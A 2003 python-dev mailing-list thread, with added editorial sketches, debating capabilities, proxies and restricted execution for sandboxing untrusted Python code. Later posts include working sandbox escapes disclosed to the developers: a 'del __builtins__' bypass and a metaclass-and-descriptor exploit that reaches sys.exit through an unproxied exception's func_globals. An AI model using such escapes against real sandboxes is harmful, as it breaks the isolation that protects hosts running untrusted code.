[Moving a discussion about capabilities to where it arguably belongs] [Ben Laurie]
The point about capabilities is that mere possession of a capability is all that is required to exercise it. If you start adding security checkers to them, then you don't have capabilities anymore. But the point is somewhat deeper than that: given capabilities, you can implement proxies without requiring any more infrastructure. You can also implement security schemes that don't really correspond to any kind of security checking at all (OK, you can probably find some convoluted way to achieve the same effect, but I'll bet it comes down to having tokens that correspond to proxies, and security checkers that allow you to proceed if you have the appropriate token - in other words, capabilities, but very hard to use).
So, it seems to me, it's simpler and more powerful to start with capabilities and build proxies on top of them (or whatever alternate scheme you want to build).
Once more, my apologies for not just getting straight to the point.
BTW, if you would like to explain why you don't think bound methods are the way to go on python-dev, I'd love to hear it.
It seems to be a matter of convenience. Often objects have many methods to which you want to provide access as a group. E.g. I might have a service configuration registry object. The object behaves roughly like a dictionary. A certain user may be given read-only access to the registry. Using capabilities, I would have to hand her a bunch of capabilities for various methods: __getitem__, has_key, get, keys, items, values, and many more. Using proxies I can simply give her a read-only proxy for the object. So proxies are more powerful.

Before you start saying that we should use capabilities as the more fundamental mechanism and build proxies on top of that: as you point out, we already have an equivalent more fundamental mechanism, bound methods, which is equivalent to capabilities. It's just that raw capabilities aren't very usable, so one way or another we've got to build something on top of that.

--Guido van Rossum (home page: http://www.python.org/~guido/)
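[Editorial note: the registry example above is concrete enough to sketch in present-day Python. The toy below is illustrative only - `Registry` and `ReadOnlyProxy` are made-up names, not Zope's API, the method set is just the read-only subset named above, and the proxy is deliberately naive (its `_target` attribute is still reachable, which is exactly the kind of leak discussed later in this thread).]

```python
# Toy sketch only: hypothetical names, not Zope's proxy implementation.

class Registry(dict):
    """A service configuration registry that behaves like a dictionary."""

registry = Registry(host="localhost", port=8080)

# Capability style: hand out one bound method per permitted operation.
caps = {name: getattr(registry, name) for name in ("get", "keys", "items")}

# Proxy style: a single wrapper exposing the whole read-only interface.
class ReadOnlyProxy:
    _allowed = frozenset({"get", "keys", "items", "values", "__contains__"})

    def __init__(self, target):
        self._target = target

    def __getattr__(self, name):
        # Called only when normal lookup fails, i.e. for forwarded names.
        if name not in self._allowed:
            raise AttributeError("read-only proxy: %r not allowed" % name)
        return getattr(self._target, name)

proxy = ReadOnlyProxy(registry)

# Mutating operations are simply not part of the proxied interface:
denied = False
try:
    proxy.pop
except AttributeError:
    denied = True
```

Handing out `caps` means one object per permitted method; handing out `ReadOnlyProxy(registry)` grants the whole read-only group at once, which is the convenience argument being made here.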
Guido van Rossum wrote:
I'm not trying to persuade you that capabilities are better than proxies. I'd prefer to build on them, and it seems you'd prefer to do it another way. That's fine with me - my goal is to make capabilities both possible and easily usable in Python, not to persuade everyone to use them (yet ;-).

Bound methods are not capabilities unless they are secured. It seems the correct way to do this is to use restricted execution, and perhaps some other tricks. What I am trying to nail down is exactly what needs doing to get us from where we are now to where capabilities actually work. As I understand it, what is needed is:

a) Fix restricted execution, which is in a state of disrepair
b) Override import, open (and other stuff? what?)
c) Wrap or replace some of the existing libraries, certify that others are "safe"

It looks to me like a and b are shared with proxies, and c would be different, by definition. Is there anything else? Am I on the wrong track?

I am going to write this all up into a document which can be used as a starting point for work to complete this.

Cheers,

Ben.

--
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/
"There is no limit to what a man can do or how far he can go if he doesn't mind who gets the credit." - Robert Woodruff
From: "Ben Laurie" <ben@algroup.co.uk>
Bound methods are not capabilities unless they are secured. It seems the correct way to do this is to use restricted execution, and perhaps some other tricks. What I am trying to nail down is exactly what needs doing to get us from where we are now to where capabilities actually work. As I understand it, what is needed is:
a) Fix restricted execution, which is in a state of disrepair
b) Override import, open (and other stuff? what?)
c) Wrap or replace some of the existing libraries, certify that others are "safe"
It looks to me like a and b are shared with proxies, and c would be different, by definition. Is there anything else? Am I on the wrong track?
there is a difference: proxies independently cover much of the holes in restricted execution.

about restricted execution:

- the way a new frame acquires the default built-ins vs. installed restricted built-ins is likely correct but needs auditing; e.g. the last problem fixed related to this was: http://python.org/sf/577530

- under restricted execution some operations, in particular reflective ops, ought to be prohibited; the code that implements this is scattered, and/because these operations share the same execution paths with "normal" ops. So the first thing is to enumerate all that should be prohibited, or devise an approach to security that can work with just a minimal set of guarantees (disabled ops and/or encapsulated objects).

These were e.g. identified "problems":

http://mail.python.org/pipermail/python-dev/2002-December/031160.html
http://mail.python.org/pipermail/python-dev/2003-January/031851.html
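[Editorial note: the point about reflective ops can be grounded with a small sketch. It is written for modern Python, where the restricted-execution machinery no longer exists, so it only illustrates the reflective path that rexec had to block: from any object handed to untrusted code, `__class__` reaches `object`, and `object.__subclasses__()` reaches essentially every class in the interpreter.]

```python
class Capability:
    """Some innocuous object handed to untrusted code."""

cap = Capability()

# Reflection walks from the instance up to the root type...
root = cap.__class__.__mro__[-1]

# ...and from the root back down to every class the interpreter knows
# about, which is why reflective ops must be prohibited (or the objects
# encapsulated) under restricted execution.
everything = root.__subclasses__()
```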
What I am trying to nail down is exactly what needs doing to get us from where we are now to where capabilities actually work. As I understand it, what is needed is:
a) Fix restricted execution, which is in a state of disrepair
Yes.
b) Override import, open (and other stuff? what?)
Don't worry about this; it's taken care of by the rexec module; each application will probably want to do this a little differently (certainly Zope has its own way).
c) Wrap or replace some of the existing libraries, certify that others are "safe"
This should only be necessary for (core and 3rd party) extension modules. The rexec module has a framework for this.
It looks to me like a and b are shared with proxies, and c would be different, by definition. Is there anything else? Am I on the wrong track?
I don't know why you think (c) is different.
I am going to write this all up into a document which can be used as a starting point for work to complete this.
Excellent.

--Guido van Rossum (home page: http://www.python.org/~guido/)
Guido van Rossum wrote:
What I am trying to nail down is exactly what needs doing to get us from where we are now to where capabilities actually work. As I understand it, what is needed is:
a) Fix restricted execution, which is in a state of disrepair
Yes.
b) Override import, open (and other stuff? what?)
Don't worry about this; it's taken care of by the rexec module; each application will probably want to do this a little differently (certainly Zope has its own way).
I believe I heard way back that there was a lack of confidence rexec overrode everything that needed overriding - or am I getting mixed up with restricted execution?
c) Wrap or replace some of the existing libraries, certify that others are "safe"
This should only be necessary for (core and 3rd party) extension modules. The rexec module has a framework for this.
It looks to me like a and b are shared with proxies, and c would be different, by definition. Is there anything else? Am I on the wrong track?
I don't know why you think (c) is different.
Because with proxies you'd wrap with proxies, and with capabilities you'd wrap with capabilities. Or do you think there's a way that would work for both (which would, of course, be great)?

Cheers,

Ben.

--
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/
"There is no limit to what a man can do or how far he can go if he doesn't mind who gets the credit." - Robert Woodruff
I believe I heard way back that there was a lack of confidence rexec overrode everything that needed overriding - or am I getting mixed up with restricted execution?
Indeed.
Because with proxies you'd wrap with proxies, and with capabilities you'd wrap with capabilities. Or do you think there's a way that would work for both (which would, of course, be great)?
OK, fair enough.

--Guido van Rossum (home page: http://www.python.org/~guido/)
On Sat, 8 Mar 2003, Ben Laurie wrote:
Because with proxies you'd wrap with proxies, and with capabilities you'd wrap with capabilities. Or do you think there's a way that would work for both (which would, of course, be great)?
This doesn't make any sense to me. The standard libraries would provide proxy wrappers in either case. The rexec vs. proxy issue doesn't enter into it.

By the way -- to avoid confusion between "proxies used to wrap unrestricted objects in order to make them into secure objects" and "proxies used to reduce the interface of an existing secure object", let's call the first "proxy" (as has been used in the "rexec vs. proxy" discussion so far), and call the second a "facet" (which is the term commonly used when capabilities people talk about reducing an interface). We often talk about providing, say, a "read-only facet" on an object.

-- ?!ng
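[Editorial note: a "facet" in this sense can be sketched as a closure that exposes only part of an already-secure object's interface. This is an illustrative toy - `readonly_facet` is a made-up name - and ordinary Python reflection can still dig the closure back out via `view.get.__func__.__closure__`, which is one reason the thread keeps returning to restricted execution.]

```python
def readonly_facet(mapping):
    """Return an object exposing only the read side of `mapping`.

    The target lives in the closure, so the facet object itself carries
    no attribute pointing back at the full-powered original.
    """
    class ReadOnlyFacet:
        def get(self, key, default=None):
            return mapping.get(key, default)

        def keys(self):
            return list(mapping.keys())

    return ReadOnlyFacet()

config = {"host": "localhost", "port": 8080}
view = readonly_facet(config)
```

The holder of `view` can read the configuration but has no name bound to `config` itself and no mutating methods - a "read-only facet" on the object.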
Ka-Ping Yee wrote:
This doesn't make any sense to me. The standard libraries would provide proxy wrappers in either case. The rexec vs. proxy issue doesn't enter into it.
We've got too much overloading here! I meant "proxy" as in "Zope proxy". Yes, in either case they'll be wrapped in some kind of (non-Zope) proxy, but the actual wrapper would be different.
By the way -- to avoid confusion between "proxies used to wrap unrestricted objects in order to make them into secure objects" and "proxies used to reduce the interface of an existing secure object", let's call the first "proxy" (as has been used in the "rexec vs. proxy" discussion so far), and call the second a "facet" (which is the term commonly used when capabilities people talk about reducing an interface). We often talk about providing, say, a "read-only facet" on an object.
This would be more applicable to an object-based capability model, which Jim and Guido seem to favour. In fact, perhaps it would be nicest to be able to do both - i.e. bound methods _and_ opaque objects. Then we'd all be happy.

Cheers,

Ben.

--
http://www.apache-ssl.org/ben.html       http://www.thebunker.net/
"There is no limit to what a man can do or how far he can go if he doesn't mind who gets the credit." - Robert Woodruff
[Ping]
By the way -- to avoid confusion between "proxies used to wrap unrestricted objects in order to make them into secure objects" and "proxies used to reduce the interface of an existing secure object", let's call the first "proxy" (as has been used in the "rexec vs. proxy" discussion so far), and call the second a "facet" (which is the term commonly used when capabilities people talk about reducing an interface). We often talk about providing, say, a "read-only facet" on an object.
Hm, I'm not sure I understand the difference between the two definitions you give. What does "making something into a secure object" mean if not "reducing its interface"? And what is the fundamental difference between a secure object and an insecure one? In my world view there's a gradual difference. The only truly secure object is None. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)
Guido van Rossum wrote The only truly secure object is None. :-)
You sure?
>>> None.__class__.__class__.mro(type(None))[1]
<type 'object'>
Not sure what else it's possible to get to from None...

Anthony

--
Anthony Baxter <anthony@interlink.com.au>
It's never too late to have a happy childhood.
On Mon, 10 Mar 2003, Guido van Rossum wrote:
Hm, I'm not sure I understand the difference between the two definitions you give. What does "making something into a secure object" mean if not "reducing its interface"? And what is the fundamental difference between a secure object and an insecure one? In my world view there's a gradual difference.
I acknowledge that it's not perfectly black and white, but what i meant in the above is that a "secure object" is one that exposes only its declared interface. The key difference i'm getting at is whether the interface is the one intended by the programmer. Proxies are for ensuring that the interface doesn't leak things the programmer never intended; facets are for the programmer to intentionally reduce the interface of an already secure object to limit its powers.

Er, perhaps another way of saying it is that proxies are at the system level and facets are at the user level.

-- ?!ng
On Sat, 2003-03-08 at 07:27, Ben Laurie wrote:
Bound methods are not capabilities unless they are secured. It seems the correct way to do this is to use restricted execution, and perhaps some other tricks. What I am trying to nail down is exactly what needs doing to get us from where we are now to where capabilities actually work. As I understand it, what is needed is:
a) Fix restricted execution, which is in a state of disrepair
b) Override import, open (and other stuff? what?)
c) Wrap or replace some of the existing libraries, certify that others are "safe"
It looks to me like a and b are shared with proxies, and c would be different, by definition. Is there anything else? Am I on the wrong track?
I have been trying to argue, though I feel a bit muddled at times, that the proxy approach eliminates the need for rexec and makes it possible to build a "restricted environment" without relying on the rexec code in the interpreter.

Any security scheme needs some kind of information hiding to guarantee that untrusted code does not break into the representation of an object, so that, for example, an object can be used as a capability. I think we've discussed two different ways to implement information hiding.

The rexec approach is to add code to the interpreter to disable certain introspection features when running untrusted code.

The proxy approach is to wrap protected objects in proxies before passing them to untrusted code.

I think both techniques achieve the same end, but with different limitations. I prefer the proxy approach because it is more self-contained. The rexec approach requires that all developers working in the core on introspection features be aware of security issues. The security kernel ends up being most of the core interpreter -- anything that can introspect on objects. The proxy approach is to create an object that specifically disables introspection by not exposing internals to the core. We need to do some more careful analysis to be sure that proxies really achieve the goal of information hiding.

I think another benefit of proxies vs. rexec is that untrusted code can still use all of the standard introspection features when dealing with objects it creates itself. Code running in rexec can't use any introspective feature, period, because all those features are disabled. With the proxy approach, introspection is only disabled on protected objects.
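[Editorial note: the "introspection is only disabled on protected objects" idea can be sketched with a toy wrapper. `Protected` is a hypothetical name and far weaker than a real C-level proxy - among other things it does not guard `type(p)`, operators, or the `object.__getattribute__` route discussed later in the thread.]

```python
class Protected:
    """Forward attribute access to a target, refusing introspection names."""

    _BLOCKED = frozenset({"__dict__", "__class__", "__module__",
                          "__reduce__", "__reduce_ex__"})

    def __init__(self, target):
        object.__setattr__(self, "_t", target)

    def __getattribute__(self, name):
        if name in Protected._BLOCKED:
            raise AttributeError("introspection disabled on protected object")
        return getattr(object.__getattribute__(self, "_t"), name)

data = [1, 2, 2]
p = Protected(data)

# Introspection on the protected object is refused...
blocked = False
try:
    p.__dict__
except AttributeError:
    blocked = True
```

Meanwhile the untrusted code's own objects keep full introspection (`[].__class__` still works); only the wrapped object is opaque, which is the benefit claimed above.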
I am going to write this all up into a document which can be used as a starting point for work to complete this.
It sounds like a PEP would be the right thing. It would be nice if the PEP could explain the rationale for a secure Python environment and then develop (at least) the capability approach to building that environment. Perhaps I could chip in with some explanation of the proxy approach. Jeremy
[Jeremy]
I have been trying to argue, though I feel a bit muddled at times, that the proxy approach eliminates the need for rexec and makes it possible to build a "restricted environment" without relying on the rexec code in the interpreter.
There's one rexec-related feature that you'll need to use though: that all built-ins (including __import__) are loaded from the __builtins__ variable in the globals, and that there's no way to get access to the default __builtins__ (assuming the restricted builtins override __import__ with something that won't let you import the real sys module, etc.).

I mention this because this is actually a larger part of the restricted execution code than the restrictions on certain introspections that are also part of it. The latter are clearly not enough, and perhaps we should drop them (*requiring* proxies or capabilities to implement the rexec module, rather than the old and wounded Bastion [see Samuele's posts]). But the former (the treatment of __builtins__) is essential.

Perhaps mostly unrelated, I'll also note something about proxy implementation. Assuming proxies are instances of a type proxy, that type must derive from object. This means that if p is a proxy, object.__getattribute__(p, 'foo') is valid. It will take some very careful analysis to prove that this cannot circumvent the proxy's safeguards. (I believe Zope's proxies are safe.)

--Guido van Rossum (home page: http://www.python.org/~guido/)
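[Editorial note: the object.__getattribute__ caveat is easy to demonstrate with a naive pure-Python proxy. This is a toy (`NaiveProxy` is a made-up name; Zope's proxies are C types designed precisely to survive this): calling object.__getattribute__ explicitly uses the default lookup machinery, side-stepping the subclass override and reading the instance dict directly.]

```python
class NaiveProxy:
    def __init__(self, target):
        self._target = target          # secret state in the instance dict

    def __getattribute__(self, name):
        if name == "_target":
            raise AttributeError("no peeking")
        return getattr(object.__getattribute__(self, "_target"), name)

secret = ["the", "raw", "object"]
p = NaiveProxy(secret)

# Ordinary attribute access is filtered:
peek_denied = False
try:
    p._target
except AttributeError:
    peek_denied = True

# But the default machinery can be invoked directly, bypassing
# NaiveProxy.__getattribute__ altogether:
leaked = object.__getattribute__(p, "_target")
```

This is why a proxy type has to be analyzed against object.__getattribute__ specifically, not just against ordinary attribute access.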
Jeremy Hylton wrote:
These are all good points.

Proxies have a dark side though. They sometimes trip up standard facilities in Python that either depend on specific types or on identity comparisons. With a bit of effort, proxies can be made highly transparent, but they change an object's type and id. For example, you can't proxy exceptions without breaking exception handling. In Zope, we rely on restricted execution to prevent certain kinds of introspection on exceptions and exception classes. In Zope, we also don't proxy None, because None is usually checked for identity. We also don't proxy strings and numbers.

I think I agree that you could build a restricted environment with proxies alone, but, to do so, you would need to make Python far more proxy-aware. I think that the language would need to be aware of proxies at a far deeper level.

Jim

--
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org
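[Editorial note: the exception point can be made concrete with a sketch. `ExcProxy` is a hypothetical wrapper; in modern Python the breakage is even blunter, because raising a non-BaseException instance is a TypeError, but the underlying problem is the one named above: the proxy has the wrong type for `except` matching.]

```python
class ExcProxy:
    """A minimal wrapper around an exception instance."""

    def __init__(self, exc):
        self._exc = exc

    def __getattr__(self, name):
        return getattr(self._exc, name)

wrapped = ExcProxy(ValueError("bad value"))

# Attribute access is forwarded faithfully...
assert wrapped.args == ("bad value",)

# ...but the wrapper's type is ExcProxy, not ValueError, so it could
# never match an `except ValueError:` clause, and re-raising it fails
# outright because ExcProxy does not derive from BaseException:
raise_failed = False
try:
    raise wrapped
except TypeError:
    raise_failed = True
```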
From: "Jim Fulton" <jim@zope.com>
For example, you can't proxy exceptions without breaking exception handling. In Zope, we rely on restricted execution to prevent certain kinds of introspection on exceptions and exception classes. In Zope, we also don't proxy None, because None is usually checked for identity. We also don't proxy strings, and numbers.
That was a question I was asking myself about proxies: exception handling. But I never had the time to play with it to check. Does that mean that restricted code can get unproxied instances of classic classes as caught exceptions?
From: "Samuele Pedroni" <pedronis@bluewin.ch>
maybe the question was unclear, but it was serious; what I was asking is whether some restricted code can do:

  try:
      deliberate code to force exception
  except Exception, e:
      ...

so that e is caught unproxied. Looking at zope/security/_proxy.c it seems this can be the case... then to be (likely) on the safe side, all exception class definitions for possible e classes, like e.g.

  class MyExc(Exception): ...

ought to be executed _in restricted mode_, or be "trivial/empty": something like

  class MyExc(Exception):
      def __init__(self, msg):
          self.message = msg
          Exception.__init__(self, msg)

      def __str__(self):
          return self.message

is already too much rope. Although it seems not to have the "nice" two-level-of-calls behavior of Bastion instances, an unproxied instance of MyExc, if MyExc was defined outside of restricted execution, can be used to break out of restricted execution.

regards.
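[Editorial note: the "too much rope" worry can be shown in a modern sketch. The restricted-execution machinery itself is gone from CPython, so this demonstrates only the reflective path, with a stand-in SECRET for the dangerous import: any method of an exception class defined outside the sandbox carries its defining module's globals with it.]

```python
SECRET = "module-level state the sandbox must never reach"

class MyExc(Exception):        # defined *outside* restricted execution
    def __init__(self, msg):
        self.message = msg
        Exception.__init__(self, msg)

def do_something():
    raise MyExc("foo")

try:
    do_something()
except Exception as e:         # e is caught unproxied
    # The method objects on e were defined in this module, so their
    # __globals__ is this module's namespace -- SECRET, or sys.exit,
    # or whatever else happens to live here.
    leaked = e.__init__.__globals__
```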
Samuele Pedroni wrote:
From: "Samuele Pedroni" <pedronis@bluewin.ch>
From: "Jim Fulton" <jim@zope.com>
For example, you can't proxy exceptions without breaking exception handling. In Zope, we rely on restricted execution to prevent certain kinds of introspection on exceptions and exception classes. In Zope, we also don't proxy None, because None is usually checked for identity. We also don't proxy strings, and numbers.
That was a question I was asking myself about proxies: exception handling. But I never had the time to play with it to check.
Does that mean that restricted code can get unproxied instances of classic classes as caught exceptions?
maybe the question was unclear,
I think it was clear.
but it was serious, what I was asking is whether some restricted code can do:
try:
    deliberate code to force exception
except Exception, e:
    ...
so that e is caught unproxied.
Right. e is caught unproxied.
Looking at zope/security/_proxy.c it seems this can be the case...
Yes.
then to be (likely) on the safe side, all exception class definitions for possible e classes: like e.g.
class MyExc(Exception): ...
ought to be executed _in restricted mode_, or be "trivial/empty": something like
class MyExc(Exception):
    def __init__(self, msg):
        self.message = msg
        Exception.__init__(self, msg)

    def __str__(self):
        return self.message
is already too much rope.
I'm not sure if you are saying that this example is "trivial/empty" or not. It seems that you are saying that it is not trivial enough. If so, why?
Although it seems not to have the "nice" two-level-of-calls behavior of Bastion instances, an unproxied instance of MyExc if MyExc was defined outside of restricted execution, can be used to break out of restricted execution.
How can it be used to break out of restricted execution?

I see three risks:

1. The exception provides methods to do harmful things, such as create side effects or provide access to data outside the exception.

2. The exception creates data that needs to be protected. For example, Zope uses a NotFoundError exception that contains an object being searched.

3. The exception methods' meta data provide access to module globals.

Risk 1 needs to be mitigated through proper exception design. Exceptions need to be limited in what their methods do. This is a bit brittle, but all standard exceptions have this property.

Risk 2 is mitigated by proxying exception instance data. Proxies can do this. This is what we've decided to do, although we haven't implemented it yet.

Risk 3 is mitigated by restricted execution.

Have I missed anything?

Jim

--
Jim Fulton           mailto:jim@zope.com       Python Powered!
CTO                  (888) 344-4332            http://www.python.org
Zope Corporation     http://www.zope.com       http://www.zope.org
How can it be used to break out of restricted execution?
OK, I have had the time to really try what I was thinking about. I have not found a way to really break out of restricted execution (which does not mean I'm sure there isn't one), BUT. I'm considering:

- Python 2.2.2
- Zope 3 3.0a1 and zope.security.interpreter.RestrictedInterpreter with zope.security.simplepolicies.ParanoidSecurityPolicy (the default)

So:

1. A bug (rexec had it too). If I remember correctly the solution is re-injecting __builtins__ before each exec:

C:\transit\Zope3-3.0a1\src\zope\security>\usr\python22\python
Python 2.2.2 (#37, Oct 14 2002, 17:02:34) [MSC 32 bit (Intel)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> import sys
>>> sys.path.append('..\..')
>>> from zope.security.interpreter import RestrictedInterpreter
>>> ri = RestrictedInterpreter()
>>> ri.ri_exec("class A: pass")
>>> ri.ri_exec("print A.__dict__")
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "..\..\zope\security\interpreter.py", line 32, in ri_exec
    exec code in self.globals
  File "<string>", line 1, in ?
RuntimeError: class.__dict__ not accessible in restricted mode
>>> ri.ri_exec("del __builtins__")
>>> ri.ri_exec("print A.__dict__")
{'__module__': '__builtin__', '__doc__': None}
or be sure to call ri_exec only once on each RestrictedInterpreter instance. Assuming that fixed:

2. If code executed under a RestrictedInterpreter could obtain a MyExc instance and had a working unproxied/non-proxying 'property' built-in, it could very likely break out of restricted execution. Fortunately the 'property' passed to such code is not working. Given that that's not the case, I skip the illustration.

3. How likely this scenario is really depends on how RestrictedInterpreter is used, how and where exceptions are defined, whether restricted code really can manage to get an instance of one of them ... whether further restrictions, e.g. on subclassing, are added or removed ... whether the general situation of restricted execution and new-style classes improves. All of this I don't know. Here I consider: a "dangerous" function ('sys.exit') is imported in the same module where MyExc is defined, MyExc is not defined under restricted execution, and a proxied function is passed to restricted code such that it can capture an instance of MyExc (as I said, whether this set of things is likely/unlikely I don't know):

<s.py>
import sys
from sys import exit  # !!! same module as MyExc
sys.path.append('C:/transit/Zope3-3.0a1/src')
from zope.security.interpreter import RestrictedInterpreter
from zope.security.checker import ProxyFactory

class MyExc(Exception):  # !!! definition outside of restricted execution
    def __init__(self, msg):
        self.message = msg
        Exception.__init__(self, msg)
    def __str__(self):
        return self.message

def myfunc():
    raise MyExc('foo')

ri = RestrictedInterpreter()
ri.globals['myfunc'] = ProxyFactory(myfunc)

f = open('c:/Documenti/x.txt', 'r')
code = f.read()
f.close()
ri.ri_exec(code)
print "OK"
</s.py>

Anyway I have a _very baroque_ x.txt that manages to call sys.exit.

regards
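The re-injection fix mentioned under point 1 can be sketched in a few lines. This is a toy model in modern Python 3 syntax with a hypothetical class name; the real RestrictedInterpreter is more involved, but the idea is just to restore the restricted __builtins__ on every call, so that "del __builtins__" cannot cause a later exec to fall back to the real builtins:

```python
class RestrictedInterpreterSketch:
    """Toy model (hypothetical name) of the __builtins__ re-injection fix."""

    def __init__(self, safe_builtins):
        self.safe_builtins = safe_builtins  # a restricted builtins mapping
        self.globals = {}

    def ri_exec(self, code):
        # Re-inject before each exec, even if the last run deleted it;
        # otherwise exec would install the *real* builtins when missing.
        self.globals['__builtins__'] = self.safe_builtins
        exec(code, self.globals)


ri = RestrictedInterpreterSketch({'len': len})
ri.ri_exec("n = len('abc')")
ri.ri_exec("del __builtins__")
ri.ri_exec("m = len('abcd')")  # still works, still restricted
```

Names not whitelisted in the safe builtins (open, __import__, ...) simply raise NameError in the executed code, no matter how many times ri_exec is called.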
I posted
<s.py> [...]
class MyExc(Exception):  # !!! definition outside of restricted execution
    def __init__(self, msg):
        self.message = msg
        Exception.__init__(self, msg)
    def __str__(self):
        return self.message

def myfunc():
    raise MyExc('foo')

ri = RestrictedInterpreter()
ri.globals['myfunc'] = ProxyFactory(myfunc)

f = open('c:/Documenti/x.txt', 'r')
code = f.read()
f.close()
ri.ri_exec(code)
print "OK"
</s.py>
Anyway I have a _very baroque_ x.txt that manages to call sys.exit.
attached is a modified version of s.py that takes a filename for the code to run inside the RestrictedInterpreter. Also myfunc is now myexc_source. There is also a new function candy; next mail on that.

Here is a run with xpl1 (was x.txt):

...>\usr\python22\python -i s.py xpl1
restricted execution
no exit
cannot access sys.exit directly
Got sys.exit
...>

no OK, no Python prompt!

here is xpl1 code [warning: metaclasses, descriptors usage, functional programming ahead :)] [some things are artifacts of the non-deliberate limitations inside RestrictedInterpreter]

#Object = ''.__class__.__base__
Type = ''.__class__.__class__

class Iter:
    __metaclass__ = Type
    def __init__(self, v):
        self.v = v
        self.i = 0
    def __iter__(self):
        return self
    def next(self):
        try:
            v = self.v[self.i]
            self.i += 1
            return v
        except IndexError:
            raise StopIteration

class consta:
    __metaclass__ = Type
    def __init__(self, o):
        self.o = o
    def __get__(self, obj, typ):
        return self.o

#
try:
    myexc_source()
except Exception, e:
    pass
MyExc = e.__class__
e__str__ = e.__str__

#
try:
    e__str__.func_globals
except:
    print "restricted execution"
try:
    exit(0)
except:
    print "no exit"
try:
    import sys
    sys.exit(0)
except:
    print "cannot access sys.exit directly"

#
class Y:
    class __metaclass__(Type):
        def __iter__(cls):
            return Iter(['func_globals'])

class X(Y, MyExc):
    message = None
    __call__ = consta(getattr)
    def __iter__(self):
        return Iter([e__str__])
    #def __get__(self,x,X):
    #    print self,x,y
    #    return map(self,x,X)
    __get__ = map

# x isinst MyExc
# x.message === x.__get__(x,X) === map(x,x,X)
# x(o,a) === getattr(o,a)
# map(None,x) === [e__str__]
# map(None,X) === ['func_globals']

x = X()
X.message = x
g = MyExc.__str__(x)
print "Got sys.exit"
g[0]['exit'](0)
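Stripped of the metaclass and descriptor machinery, the leak xpl1 is reaching for is small. A bound method carries a reference to its defining function, and the function carries the globals of the module where the exception class was defined, including anything imported there, such as sys. The sketch below shows the direct one-step version in Python 3 spelling (func_globals became __globals__); in restricted mode the direct attribute access is blocked, which is why the exploit has to route the same lookup through map and __get__:

```python
import sys

class MyExc(Exception):
    def __init__(self, msg):
        self.message = msg
        Exception.__init__(self, msg)
    def __str__(self):
        return self.message

e = MyExc('foo')

# The bound method forwards attribute lookups to its underlying function,
# so its module globals -- including the imported sys -- are one step away.
g = e.__str__.__globals__  # spelled func_globals in Python 2.2
```

From g, unrestricted code can reach g['sys'].exit (or anything else imported next to the exception class), which is exactly what the baroque x.txt ends up calling.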
[me]
attached is a modified version of s.py that takes a filename for the code to run inside the RestrictedInterpreter. Also myfunc is now myexc_source. There is also a new function candy; next mail on that.
Consider from s.py:

-- * --
from sys import exit
...
def candy(s):
    if s == "yes":
        return 'candy'
    else:
        return 'none'

ri = RestrictedInterpreter()
ri.globals['candy'] = ProxyFactory(candy)
...
ri.ri_exec(code)
print "OK"
-- * --

No unproxied exceptions; on the other hand, both rexec and the prototype RestrictedInterpreter supply code with globals() [!], and apply() ... I have some _even more baroque_ code (xpl2) that exploits candy and manages to call sys.exit:

...>\usr\python22\python -i s.py xpl2
candy
Got sys.exit
...>

In this case xpl2 could be rewritten as a single expression of the form:

candy(...)

although that would make for a totally masochistic exercise and a totally obfuscated Python entry. No, I haven't done/tried that :)

regards.
On Sun, 2003-03-09 at 14:09, Samuele Pedroni wrote:
maybe the question was unclear, but it was serious: what I was asking is whether some restricted code can do:
try:
    deliberate code to force exception
except Exception, e:
    ...
so that e is caught unproxied. Looking at zope/security/_proxy.c it seems this can be the case...
then to be (likely) on the safe side, all exception class definitions for possible e classes: like e.g.
class MyExc(Exception): ...
ought to be executed _in restricted mode_, or be "trivial/empty": something like
class MyExc(Exception):
    def __init__(self, msg):
        self.message = msg
        Exception.__init__(self, msg)
    def __str__(self):
        return self.message
is already too much rope.
Although it seems not to have the "nice" two-level-of-calls behavior of Bastion instances, an unproxied instance of MyExc, if MyExc was defined outside of restricted execution, can be used to break out of restricted execution.
Exceptions do seem like a problem. If the exception objects are defined in the safe interpreter, then untrusted code that catches an exception can't follow references to an unsafe interpreter. But it can modify the exception objects and classes, which has the potential to cause a lot of problems.

It also complicates the design of systems that want to run untrusted code, because they must be very careful never to pass trusted exception instances to untrusted code.

It seems like it would be nice if proxies could be used as exceptions, so that there was a simple mechanism to enforce protection.

Jeremy
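Why plain wrapping breaks exception handling can be seen directly. In modern Python 3 (with a hypothetical minimal Proxy class standing in for a security proxy), the raise statement type-checks its argument, so a proxied exception can be neither raised nor matched by an except clause naming the real class:

```python
class SecretError(Exception):
    pass

class Proxy:
    """Hypothetical minimal wrapper standing in for a security proxy."""
    def __init__(self, obj):
        object.__setattr__(self, '_obj', obj)
    def __getattr__(self, name):
        # forward ordinary attribute access to the wrapped object
        return getattr(object.__getattribute__(self, '_obj'), name)

p = Proxy(SecretError('hidden'))

unraisable = False
try:
    raise p  # a proxy is not a BaseException subclass
except TypeError:
    unraisable = True  # "exceptions must derive from BaseException"
```

Attribute access through the proxy still works (p.args forwards fine), but the except machinery matches on the class of the raised object, and the proxy's class is Proxy, not SecretError. This is the reason for the compromise described below: pass the real exception instance, and proxy only its instance data.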
Samuele Pedroni wrote:
From: "Jim Fulton" <jim@zope.com>
For example, you can't proxy exceptions without breaking exception handling. In Zope, we rely on restricted execution to prevent certain kinds of introspection on exceptions and exception classes. In Zope, we also don't proxy None, because None is usually checked for identity. We also don't proxy strings and numbers.
That was a question I was asking myself about proxies: exception handling. But I never had the time to play with it to check.
Does that mean that restricted code can get unproxied instances of classic classes as caught exceptions?
Right. What we can (and will) do is intercept the exceptions and proxy the exception's instance data. So we'll be relying on restricted execution to protect the exception method metadata and on proxies to protect the exception data. Of course, we'd prefer to be able to proxy the exception instances themselves.

Jim
Jeremy Hylton wrote:
On Sat, 2003-03-08 at 07:27, Ben Laurie wrote:
Bound methods are not capabilities unless they are secured. It seems the correct way to do this is to use restricted execution, and perhaps some other tricks. What I am trying to nail down is exactly what needs doing to get us from where we are now to where capabilities actually work. As I understand it, what is needed is:
a) Fix restricted execution, which is in a state of disrepair
b) Override import, open (and other stuff? what?)
c) Wrap or replace some of the existing libraries, certify that others are "safe"
It looks to me like a and b are shared with proxies, and c would be different, by definition. Is there anything else? Am I on the wrong track?
